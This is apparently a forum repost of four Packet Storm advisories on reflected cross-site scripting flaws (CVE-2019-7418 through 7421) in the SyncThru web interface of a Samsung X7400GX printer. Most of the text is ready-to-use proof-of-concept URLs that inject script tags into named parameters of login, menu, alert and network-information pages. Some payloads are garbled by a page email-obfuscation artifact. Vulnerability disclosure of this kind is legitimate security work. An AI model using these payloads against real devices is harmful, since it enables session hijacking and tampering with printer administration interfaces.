SAMSUNG X7400GX Sync Thru Web Cross Site Scripting

#219
Topic created · 1 Posts · 1 Views
  • SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 suffers from multiple cross site scripting vulnerabilities.
    MD5 | a47c5206828796cf3e2e422be90d87fa
    Download

    <!--  
    # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
    Service  
    # Date: 24-01-2019  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Software Link: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
    Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
    # Tested on: all  
    # CVE : CVE-2019-7418  
    # Category: webapps  
    1. Description  
    XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
    V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters:  
    flag, frame, func, and Nfunc.  
    2. Proof of Concept  
    URL  
    http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg  
    ','','')&flag=&[[email protected]](/cdn-cgi/l/email-protection)%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org  
    &msg=The%20requested%20report(s)%20will%20be%20printed  
    Parameter  
    [[email protected]](/cdn-cgi/l/email-protection)<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
    URL  
    http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg  
    ','','')&[[email protected]](/cdn-cgi/l/email-protection)%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org  
    &frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
    Parameter  
    [[email protected]](/cdn-cgi/l/email-protection)<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
    URL  
    http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&[[email protected]](/cdn-cgi/l/email-protection)%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
    Parameter  
    [[email protected]](/cdn-cgi/l/email-protection)<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
    URL  
    http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&[[email protected]](/cdn-cgi/l/email-protection)%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg  
    ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
    Parameter  
    [[email protected]](/cdn-cgi/l/email-protection)<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
    URL  
    http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&[[email protected]](/cdn-cgi/l/email-protection)%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg  
    ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
    Parameter  
    [[email protected]](/cdn-cgi/l/email-protection)<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
    URL  
    http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg  
    ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed  
    Parameter  
    popupid=<SCRIPT>alert("XSS");</SCRIPT>  
    3. Solution:  
    Update to last version this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
    Service  
    # Date: 24-01-2019  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Software Link: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
    Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
    # Tested on: all  
    # CVE : CVE-2019-7419  
    # Category: webapps  
    1. Description  
    XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
    V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters:  
    ruiFw_id, ruiFw_pid, ruiFw_title.  
    2. Proof of Concept  
    URL  
    http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E  
    Parameter  
    ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT>  
    URL  
    http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento  
    Parameter  
    ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT>  
    URL  
    http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento  
    Parameter  
    ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT>  
    3. Solution:  
    Update to last version this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
    Service  
    # Date: 24-01-2019  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Software Link: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
    Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
    # Tested on: all  
    # CVE : CVE-2019-7420  
    # Category: webapps  
    1. Description  
    XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
    V11.01.05.25_08-21-2015 in  
    "/sws.application/information/networkinformationView.sws" in the tabName  
    2. Proof of Concept  
    URL  
    http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    3. Solution:  
    Update to last version this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web  
    Service  
    # Date: 24-01-2019  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Software Link: http://www.samsungprinter.com/,  
    http://www.samsung.com/Support/ProductSupport/download/index.aspx  
    # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System  
    Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015  
    # Tested on: all  
    # CVE : CVE-2019-7421  
    # Category: webapps  
    1. Description  
    XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25  
    V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple  
    parameters: contextpath and basedURL.  
    2. Proof of Concept  
    URL  
    http://X.X.X.X/sws.login/gnb/[[email protected]](/cdn-cgi/l/email-protection)%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org  
    Parameter  
    [[email protected]](/cdn-cgi/l/email-protection)<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org  
    URL  
    http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login  
    Parameter  
    basedURL=<SCRIPT>alert(XSS);</SCRIPT>  
    3. Solution:  
    Update to last version this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    

    Source: packetstormsecurity.com

Log in to reply